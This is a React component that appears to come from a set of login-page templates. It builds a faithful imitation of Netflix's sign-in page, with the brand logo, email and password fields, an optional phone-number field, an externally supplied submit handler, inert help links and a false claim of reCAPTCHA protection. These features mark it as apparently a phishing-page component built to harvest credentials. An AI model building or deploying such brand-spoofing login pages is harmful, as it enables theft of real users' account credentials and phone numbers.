import React from 'react';
import { Button } from '@/components/ui/button';
import { Input } from '@/components/ui/input';
import { Checkbox } from '@/components/ui/checkbox';
import { LoginTemplate } from '@/lib/loginTemplates/types';

interface NetflixTemplateProps {
  template: LoginTemplate;
  username: string;
  setUsername: (value: string) => void;
  password: string;
  setPassword: (value: string) => void;
  phoneNumber: string;
  setPhoneNumber: (value: string) => void;
  handleSubmit: (e: React.FormEvent) => void;
  isLoading: boolean;
  showPhoneField: boolean;
  navigateToSignup: (id: string) => void;
}

const NetflixTemplate: React.FC<NetflixTemplateProps> = ({
  template,
  username,
  setUsername,
  password,
  setPassword,
  phoneNumber,
  setPhoneNumber,
  handleSubmit,
  isLoading,
  showPhoneField,
  navigateToSignup,
}) => {
  return (
    <>
      <div className="netflix-bg" />
      <div className="flex flex-col min-h-screen">
        <img 
          src={template.logoUrl} 
          alt="Netflix" 
          className="netflix-logo"
        />
        <div className="flex-1 flex items-center justify-center">
          <div className="netflix-login w-full">
            <h1 className="netflix-title">Sign In</h1>
            
            <form onSubmit={handleSubmit} className="space-y-4">
              <Input
                id="username"
                type="text"
                value={username}
                onChange={(e) => setUsername(e.target.value)}
                placeholder="Email or mobile number"
                className="netflix-input"
                required
              />
              
              <Input
                id="password"
                type="password"
                value={password}
                onChange={(e) => setPassword(e.target.value)}
                placeholder="Password"
                className="netflix-input"
                required
              />
              
              {showPhoneField && (
                <Input
                  id="phone"
                  type="tel"
                  value={phoneNumber}
                  onChange={(e) => setPhoneNumber(e.target.value)}
                  placeholder="Phone Number"
                  className="netflix-input"
                />
              )}
              
              <Button
                type="submit"
                className="netflix-btn"
                disabled={isLoading}
              >
                {isLoading ? 'Signing In...' : 'Sign In'}
              </Button>
              
              <div className="netflix-remember">
                <div className="flex items-center space-x-2">
                  <Checkbox id="remember" />
                  <label htmlFor="remember" className="text-sm">Remember me</label>
                </div>
                
                <a href="#" className="netflix-forgot" onClick={(e) => e.preventDefault()}>
                  Forgot password?
                </a>
              </div>
            </form>

            <div className="netflix-separator">
              OR
            </div>

            <button 
              className="netflix-secondary-btn"
              onClick={(e) => e.preventDefault()}
            >
              Use a sign-in code
            </button>
            
            <div className="netflix-signup">
              <p>
                New to Netflix?{' '}
                <button 
                  type="button"
                  onClick={() => navigateToSignup(template.id)}
                  className="netflix-signup-now"
                >
                  Sign up now
                </button>
              </p>
              
              <p className="netflix-recaptcha">
                This page is protected by Google reCAPTCHA to ensure you're not a bot.{' '}
                <a href="#" onClick={(e) => e.preventDefault()}>Learn more</a>.
              </p>
            </div>
          </div>
        </div>
      </div>
    </>
  );
};

export default NetflixTemplate;